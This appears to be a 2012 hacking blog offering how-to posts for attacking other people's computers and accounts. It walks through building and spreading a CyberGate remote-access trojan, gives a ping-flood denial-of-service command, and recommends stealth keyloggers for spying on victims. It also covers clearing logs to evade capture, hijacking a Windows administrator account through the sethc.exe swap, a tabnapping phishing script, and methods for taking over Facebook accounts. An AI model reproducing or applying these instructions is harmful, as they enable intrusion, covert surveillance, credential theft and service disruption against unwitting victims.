Wednesday 14 November 2012

Hack Pc using Cybergate

Firstly, Start off by downloading Cybergate RAT:
Download Mirror 1
Download Mirror 2

Now, Go to No-ip.com

Sign Up and everything. now log in and press Add Host
Now name your host to whatever you want.. i will name my host to Cocacolanerds.no-ip.biz. Just follow theese settings and press Create Host.


Congratulations! You are done with The No-Ip! :)

Let's move on with the Cybergate RAT

Open Up Cybergate.. (Wich you downloaded in the beginning)

Now click Control Center - Start

Click Control Center - Options - Select Listening Ports And Do Following:
Good, You Are Done With The Settings! Now, let's move on to the Virus Creation :).

Click Control Center - Builder - Create Server. Make a new User named Hacking. Press Ok.
Mark the user "Hacker" And press Forward.

Now you should have something like this;
Press 127.0.0.1 | Port 999 and press Delete..:
After that, Click Add.

Now, A Box should pop up saying: 127.0.0.1:81. Like this:
Remove everything and change it with the No-ip adress you host you added.. So let's say you used example.no-ip.biz. Change 127.0.0.1 to example.no-ip.biz and the :81.. Since we used port 82, Change :81 to :82, so it should look like this:
But since my No-ip adress was cocacolanerds.no-ip.biz, i have to change it to MY. but i keep the :82...

Now Change the
Identification: remote
Password: cybergate

To This:
Identification: Cyber
Password: 123456

Good! You are now done with that :). Let's move on to "Installation"

Use the Exact same settings as i do. :
Good, We Skip Message. We Skip Keylogger. In the Anti Debug Have everything checked

In The Build Server: Use Google Chrome Passes and UPX.. (Makes the server smaller)

And press Create Server. Good, You do now have your RAT server complete!

If your RAT doesent work. check following things:

Non-Connecting RATs

1. You are properly port-forwarded if using a router.
2. You have the No-IP Client installed and running.
3. Your DNS entries are correctly spelled when building your server.
4. The password in Listening Ports and the password your server uses are identical.
5. You are Listening on the correct ports.
6. Your Firewall is letting connections through on the port you're listening on.
7. Your server is added to excluded files in your Antivirus and Firewall.
8. Your server injects explorer.exe instead of the default browser.

How to port forward..

Go to Portforward.com and lookup your Router, there shall be a guide on how to port forward on it :). and if you are on a modem.. then you don't need to port forward.

Enter Start - Run . Command. Type Ipconfig

In the "Standard Gateway", That is your Router IP. Type that into your web browser. Log in, And Port forward port: 82

Restart your router and you are done! :).. Just send the RAT Server to any slave OUTSIDE your network.

Hope you enjoyed watching this tutorial & i wish you all the best with your victims ;)

Hacking website withDDOS




Hacking With DDOS



--{============}--
:)♥♥♥♥♥♥♥♥♥♥♥♥♥:-P




First open your CMD from run ( window + r )


Now the important thing what we want is the ip address of the site that we are going to attack.

To get the ip of any site just type nslookup in cmd followed by the address of website

for eg: if you want the ip address of google just type

nslookup http://www.google.com/

this command will give you the ip address

Ok , now you got the ip address of the site you are going to attack,

then type the following command in your CMD and hit enter

ping website-IP -l 65500 -n 10000000 -w 0.00001

-n 10000000= the number of DoS attemps.. u can change the value "10000000" with ur desiredvalue u want to attempt attack.

website-IP= Replace the text with the ip address of the site u want to be attacked..

-w 0.00001 = It is the waiting time after one ping attack.

for eg: if the ip address is 112.158.10.2

just type

ping 112.158.10.2 -l 65500 -n 10000000 -w 0.00001

And thats it you are done . Dont Change or Remove -l, -n and -w in this command.. otherwise it wont work

Speak Your Computer

 STEPS TO MAKE YOUR COMPUTER SPEAK:
1.Open your notepad.
2.Copy the below code and paste it in your notepad.
{ Dim message, sapi message=InputBox("What do you want me to say?","Speak to Me") Set sapi=CreateObject("sapi.spvoice") sapi.Speak message }
3.Now save the notepad file with the name speak.vbs on your desktop.
4.Double Click on speak.vbs and type in the box whatever you want your computer speak to you....................

Malwares

Malware has been a problem for ages, Malware is short for malicious software. A Malware is basically a program designed to infect a computer system without owner being informed.





Types of Malware



Malware exists in many forms, below mentioned are some of the common types of malware .



1. Trojan Horse-

Trojan virus or Trojan horse is one of the most common types of malware, Trojanvirus is mostly used to control the victims computer rather than infecting or destroying files on victims computer. A Trojan horse once installed into victims computer can give a hacker complete access to your computer. Trojans are one of the most dangerous forms of malware.

2. Computer Viruses-

A computer virus a malicious program which is mostly developed to infect a computer, once it infects a computer it replicates or reproduces itself. A virus is just like a parasite and it needs another host to attach to in order to infect a computer.

3. Worms-

Worms are almost similar to computer viruses the only difference unlike computer viruses they do not require another host to attach to in order to infect a computer. Once a worm infects a computer it replicates itself. Computer worms are major threats to large networks.

4. Keyloggers-

A Keylogger is a hardware or software device which monitors every keystroke, screen shots, chats etc typed on the computer. A keylogger program does not require physical access to the user's computer. Any person with a basic knowledge of computer can use keylogger.

5. RATS -

RAT is The shor of Remote Administration Tool and is indeed one of the of dangerous type of malvare it is very similar to a Trojan. Once a RAT is installed in a computer the attacker can do almost anything on the remote computer such as installing a keylogger, shutting down a computer, infecting files etc.

6. Adware-

Adware is the short form of Advertisement-supported software. Adware are commonly designed to displayt advertisement on your computers. However some of these adwares may contain harmful viruses and spying programs which can bring your computer system to knees.



<><><><><><><><><><><><><END><><><><><><><><><><><><>

Facebook Chatbox collour text

The Codes For All The color full Letters in Facebook Chat



Hello Friendi am Mirza Hassan today i am posted codes for all the color full letters in Facebook chatNow Guys you can also write message to your friend in this type of Style....Ya in COLOURFULL letter.. Here Is the Tricks.. today I am sharing with you....



Here we go......Here is the code for all the Alphabetical



[[244961858909298]] = A

[[344113652270150]] = B

[[344991278847613]] = C

[[164461493653696]] = D

[[196752423751220]] = E

[[301630573215430]] = F

[[251496118250464]] = G

[[266394220086654]] = H

[[164866556948132]] = I

[[180599335371968]] = J

[[209067005843651]] = K

[[238594039545396]] = L

[[147702285338528]] = M

[[309221402452022]] = N

[[180901405340714]] = O

[[246506925416551]] = P

[[333343613344059]] = Q

[[123128367803569]] = R

[[316143388416019]] = S

[[334073456605673]] = T

[[199626093460643]] = U

[[224202614323263]] = V

[[336032459740792]] = W

[[205228226232732]] = X

[[142420399202282]] = Y

[[157919817645224]] = Z



Hope you all enjoy this tricks.. so dont forget to comment and share it..!!!!

Software Keylogger

Software keyloggers can also be classified into two types:



1. Local Keylogger



2. Remote Keylogger





Local Keylogger



Local Keyloggers are used to monitor local computers (May be your own Pc), they are very easy to install and are completely undetectable and its really hard to figure out once a keylogger is installed on a computer because usually keyloggers hide themselves from taskmanager, Windows Registry etc. Whenever you want to see logs, screenshots etc you just need to press a hotkey which (ex.Shift+Ctrl+F10)



There are hundreds of keyloggers available now days but some of them are userfriendly and are actually capable to hide themselves once they are installed, some of the Popular Local Keyloggers are:



1. Spyagent 2. AllSpy Keylogger3. Refog keylogger





SpyAgent



Spytech agent is an award winning software which can be used to monitor both local and remote computer but its usually good local monitoring, for remote monitoring there are software better than SpyAgent with far more features than it. Spytech Spyagent runs in total stealth mode and once it is installed on victims computer it's almost impossible to detect it's presence



AllSpyKeylogger



Allspy keylogger is best known for it user friendly interface, It can record keystrokes, Chatlogs, websites visited etc(Nothing Special), I guess all the other keyloggers have the ability to record all above things. The only thing I like about Allspy keylogger is that it has a veryuser-friendly interface and a person even with basic knowledge computer can use Allspy keylogger



Remote Keyloggers

Remote keyloggers are used for the purpose of monitoring a rempc, Once a remote keylogger is installed on your computer the attacker can get your keystrokes, your webcam shots, chat logs esitting in any part of the world.





THESE ARE THE TWO BEST REMOTE KETLOGGERS



1. Sniperspy



2. Winspy







Winspy Keylogger



WinSpy Software is a Complete Stealth Monitoring Software that can both monitor your Local PC and Remote PC. It includes Remote Install and Real-time Remote PC Viewer. Win Spy Software will capture anything the user sees or types on the keyboard.



Sniperspy Keylogger



Sniperspy is one of my most favorite keyloggers, It is extremely powerful and has a very low antivirus detection rate. SniperSpy is theindustry leading Remote password hacking software combined with the Remote Install and Remote Viewing feature.



Once installed on the remote PC(s) you wish, you only need to login tyour own personal SniperSpy account to view activity logs of the Remote PC's ! This mean that you can view logs of the remote PC's from anywhere in the world as long as you have internet access



Do you want to Spy on a Remote PC? Expose the truth behind the lies! Unlike the rest, SniperSpy allows you to remotely spy any PC likea television! Watch what happens on the screen LIVE! The only remote PC spy software with a SECURE control panel!



This Remote PC Spy software also saves screenshots along with text logs of chats, websites, keystrokes in any language and more. Remotely view everything your child, employee or anyone does while they use your distant PC. Includes LIVE admin and control commands!





Which software keylogger is better Sniperspy or Winspy?





I recommend Sniperspy for the following reasons:



1. Sniperspy is Fully compatible with windows vista,but winspy has known Compatibility issues with Windows vista

2. It has low antivirus detection rate

3. Sniperspy can bypass firewall but Winspy cant.

4. Sniperspy is recognized by CNN,BBC,CBS and other popular news network,

Hardware Keylogger

Keycobra – Best Hardware Keylogger



Now you might be wondering where you can find a hardware keylogger, well there are lots of hardware keyloggers available now a days but I would recommend you to use keycobra



Keycobra is one of my favorite hardware keyloggers as it offers more large amount of storage, Keycoabra keystroke recorder comes in a standard version - 4MB memory capacity, 2,000,000 keystrokes (over 1,000 pages of text), and a Venom version 2 billion keystrokes (over 1 million pages of text), organized into an advanced flash FAT file system. It is compatible with all three operating systems windows,linux and Mac OS, Here are some features of hardware keylogger due to

which keycobra is one of the most popular hardware keyloggers around.



Features



Record ALL Keystrokes - even Facebook passwords!



Huge memory capacity, organized as an advanced flash FAT file system



Advanced text menu for viewing recorded data, includes Net Detective, Phrase Search, Key Filtering, Unplug Counter and more!



Super fast memory contents download with USB Download Accelerator (included)





Keysnatch



Keysnatch has also a variety of keyloggers including PS/2 keyloggers, USB keyloggers and Wifi keyloggers, The Wifi keylogger has a built in WLAN transceiver and TCP/IP stack, which means that it can connect to the internet through a wifi-acess point



How It Works?



Once the Wifi keylogger has connected to an access point, The Keysnatch wifi keylogger will then actively send you all the keystrokes typed by the victim to any email address you provide. The keysnatch wifi keylogger is compatible with all other major operating systems, you name it and it runs on it. Keysnatch keylogger supports all types of a keyboard and the best part is that its completely undetectable by antiviruses.

Facebook Hacking Using Keylogger

Keyloggers can be classified into two main types:



1. Hardware Keylogger

2. Software Keylogger





Hardware Keyloggers



A hardware keylogger is also used for keystroke logging, a hardware keylogger is plugged between the keyboard plug and the USB or PS/2 port socket, and they work with PS/2 keyboards and also usb keyboards,

A hardware keylogger is just like a normal USB drive or any other computer peripheral so that the victims can never doubt that it is a keylogger, Hardware keylogger has any inbuilt memory which stores the typed keystrokes.







Software Keyloggers



The hardware keyloggers are extremely useful only in case if you have physical access to victims computer, but what if you dont have physical access to victims computer and sometimes the victim might notice it

Tuesday 13 November 2012

How hackers Never get caught

How hackers get caught.
Hiding you and securing as “Hacker”.
Destroying your system logs.
Setting up VPN – Making you anonymous.

1) How hackers get caught:

- First stuff that gives you away are “LOGS”.
You need to know how events, application, and system logs work. If you dont, you can be easily caught!
The shell history will expose your actions.
Another giveaway is leaving a “:wq” in /var/log/messages or binarys.

- Your laziness will take you into problems.
NEVER HACK FROM HOME! Take your time, and go to net cafe or anywhere else apart from home. Logs will take you down!

- The code that you run on system will take you down. If you compile the code on target, libraries will give you away!

- If your victm, notice, that he is maybe hacked, or something is wrong.. He will ask from his ISP for IP logs, and if you dont use VPN, or if you hack from home, they will hunt you down.

- Thing, that takes you down 100% is BRAGGING. It is common problem of beginning hackers. They like to brag, to earn respect and reputation but NOT KNOWING that is the matter of minutes, hours may be days when they will be caught.
*Don’t use Hotmail. CIA Owns it!

2) Hiding and Securing you as “Hacker”

- Temporary guest accounts, unrestricted proxy servers, buggy Wingate servers, and anonymous accounts can keep hackers carefree.

*A young hacker is less likely to know all the little things that an expert hacker might know. Besides, the young hacker may be trying to impress others – and get a little careless about covering his tracks. This is why younger hackers are often caught.
*An older hacker, on the other hand, will rarely leave any tracks. They know how to use their slave’s computers as a tool for a launching place to get into another computer.

There will always be hackers, and there will always be hackers in prison.

* DESTROY LOGS, REMOVE ALL YOUR TRACKS!

* DO NOT HACK AT HOME! USE VPN THAT SAVES NO LOGS!

HOW TO REMOVE YOUR SYSTEM LOGS:

Choose Start > Control Panel.
Double-click Administrative Tools, and then double-click Event Viewer.
In either pane of the Event Viewer window, right-click System and then select Clear All Events.
To save the current system log, click Yes when Windows returns the message, “Do you want to save ‘System’ before clearing it?”, enter a file name for the saved system log file, and then click Save.


Virtual Private Network – VPN

1)I will recommend you to use proXPN.
It is VPN that do not store logs.
proXPN: http://proxpn.com/download.phpProXPN Windows installation:


(I used images from proXPN official website)
Click “Next”
Just click “Agree” here to continue installation.
Let the installer run until completion.
Just click the “Finish” button to complete the installation.
Welcome to the proXPN client. Click the “Don’t have an account?” link to create a new account.
Enter your email address and the password of your choice. Then check the license agreement checkbox and click the “I agree – create account” button.
Click “OK” to finish the account signup process in the software client.
Check your email for a greeting email from proXPN. In that email is a link which you will need to click in order to activate your free account. If it doesn’t show up within a reasonable timeframe, make sure to check your spam folders. Once you’ve clicked the link in the email, your account should be active. Go ahead and click the “connect” button to connect to proXPN
Once you connect, the system tray icon will turn green. You’re now surfing safe and secure, courtesy of proXPN.

And you are done with securing yourself.
i.e How hackers Never get caught
Just to make sure, go check if you are truly anonimous
http://www.ip-adress.com/Proxy_Checker/

hack windows xp administrator password

Hack windows xp administrator password
windows xp admin password hacking through Guest Account:
admin account from a guest account by which you can reset the administrator Ever wanted to hack your college pc with guest account/student account so that you can download with full speed there ? or just wanted to hack your friend’s pc to make him gawk when you tell your success story of hacking ? well,there is a great way of hacking an administrator password and getting all the privileges an administrator enjoys on windows..Interested ?

Concept:

Press shift key 5 times and the sticky key dialog shows up.This works even at the logon screen. But If we replace the sethc.exe which is responsible for the sticky key dialog,with cmd.exe, and then call sethc.exe by pressing shift key 5 times at logon screen,we will get a command prompt with administrator privilages because no user has logged on. From there we can hack the administrator password,even from a guest account.

Prerequisites

Guest account with write access to system 32.

Here is how to do that -

* Go to C:/windows/system32
* Copy cmd.exe and paste it on desktop
* rename cmd.exe to sethc.exe
* Copy the new sethc.exe to system 32,when windows asks for overwriting the file,then click yes.
* Now Log out from your guest account and at the user select window,press shift key 5 times.
* Instead of Sticky Key confirmation dialog,command prompt with full administrator privileges will open.
* Now type “ NET USER ADMINISTRATOR aaa” where “aaa” can be any password you like and press enter.
* You will see “ The Command completed successfully” and then exit the command prompt and login into administrator with your new password.
* Congrats You have hacked admin from guest account.

Further..

Also, you can further create a new user at the command prompt by typing “NET USER XERO /ADD” where “XERO” is the username you would like to add with administrator privileges. Then hide your newly created admin account by -

Go to registry editor and navigate to this key

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]

Here create a new DWORD value, write its name as the “user name” that u created for your admin account and live with your admin account forever

ADVANCE PHISHING (TABNAPPING)





Make a web page and use the tab napping script in that page say it page A. This script will not affect the layout or content of the page. This script will check for user actions. If the page is idle for some time, this script will redirect this page to a pre-specified page which may be your phishing page. You have to specify this page in the script. Be sure to change this in script.

check script for this line...



timerRedirect = setInterval("location.href='http://www.gmail.com'",10000);



this line will redirect to Gmail after 10 sec. Change this location to the address of your phishing page. This line is used 2 times in the script so change in both lines.



so, page A with tab napping script will redirect to phishing page B.



Now send the link of the page A to your victim. This is a normal page. If the page is idle for some time it will be changed to page B otherwise no effect.



Hacking internet and computer tips and tricks











<script type="text/javascript">

var xScroll, yScroll, timerPoll, timerRedirect, timerClock;



function initRedirect(){

if (typeof document.body.scrollTop != "undefined"){ //IE,NS7,Moz

xScroll = document.body.scrollLeft;

yScroll = document.body.scrollTop;



clearInterval(timerPoll); //stop polling scroll move

clearInterval(timerRedirect); //stop timed redirect



timerPoll = setInterval("pollActivity()",1?); //poll scrolling

timerRedirect = setInterval("location.href='http://www.gmail.com'",10000); //set timed redirect





}

else if (typeof window.pageYOffset != "undefined"){ //other browsers that support pageYOffset/pageXOffset instead

xScroll = window.pageXOffset;

yScroll = window.pageYOffset;



clearInterval(timerPoll); //stop polling scroll move

clearInterval(timerRedirect); //stop timed redirect



timerPoll = setInterval("pollActivity()",1?); //poll scrolling

timerRedirect = setInterval("location.href='http://www.gmail.com'",10000); //set timed redirect





}

//else do nothing

}



function pollActivity(){

if ((typeof document.body.scrollTop != "undefined" && (xScroll!=document.body.scroll?Left || yScroll!=document.body.scrollT?op)) //IE/NS7/Moz

||

(typeof window.pageYOffset != "undefined" && (xScroll!=window.pageXOffset || yScroll!=window.pageYOffset)))? { //other browsers

initRedirect(); //reset polling scroll position

}

}



document.onmousemove=initRedir?ect;

document.onclick=initRedirect;

document.onkeydown=initRedirec?t;

window.onload=initRedirect;

window.onresize=initRedirect;

</script>


Note:You have to copy a source code and paste it into two seperate notepadd++ tab
the first one for the tabnapping, so you will put the script here so that it will redirect to the second one which is actually your phishing page...

Monday 12 November 2012

Facebook Hacking



Different Ways To Hack Facebook Accounts :-)



1:) phishing:- Phishing or fake page hacking is the most widely used hacking trick for any type of accounts of website. It can also be implemented as in this case too.. That post was specially for Gmail. The same process will be applied in the case of faceook too. you only need to save facebook login page to your system and make changes to form element of action as per in my that post. you can also use Tabnapping . This is also a type of phishing but it will make it easier to send your fake page to the victim.



IMPORTANT: sending fake page in case of simple case is not so easy. I am suggesting you an effective way of doing that. You get Facebook notification emails. Use the format of that email address but replacing the URL with your fake URL ;)





2:) Keylogger:- Keylogger is another useful tool to hack someone's facebook account. If you do not know about keyloggers search google . download some keyloggers from google. Kelogger download . Now it's up to you.. how you are using this tool. If you have physical access to victims system, you can manually install this tool and it will effectively work.



Download WinSpy and read How to hack facebook with keylogger



NOTE: Never search for the free or crack. Because that will not work. Some hackers also hosted it for free with Trojan. When you will use those free hosted on some file hosting server, you are taking risk with your facebook account which can be hacked with that trojan. So download only with the official link given above.





3: Firesheep:- If your victim uses unsecure wireless network then you can hack him easily by using mozilla firefox and a simple firefox plugin. Firesheep. read this post to know about firesheep and dowload it from that post. Firesheep use this tool to hack.





4: Hack facebook's primary email address:- Hacking someone's email account also need above described methods (phishing, keylogger, firesheep) but you can also hack it by using forgot password and then by guessing his security question. Many times people use simple security questions.





5: facebook's can't access account option:- there is an recovery option in facebook account. You can mention that your primary email address is also hacked. Then they will ask you many questions regarding that account. as some name of friends, account holder's some personal information etc. If you know about victim well, you can be able to answer all those question. then facebook will ask you for new email address for password recovery. Give any email address which you can access.

Wellcome To Hack Center

Here you got all hacking tricks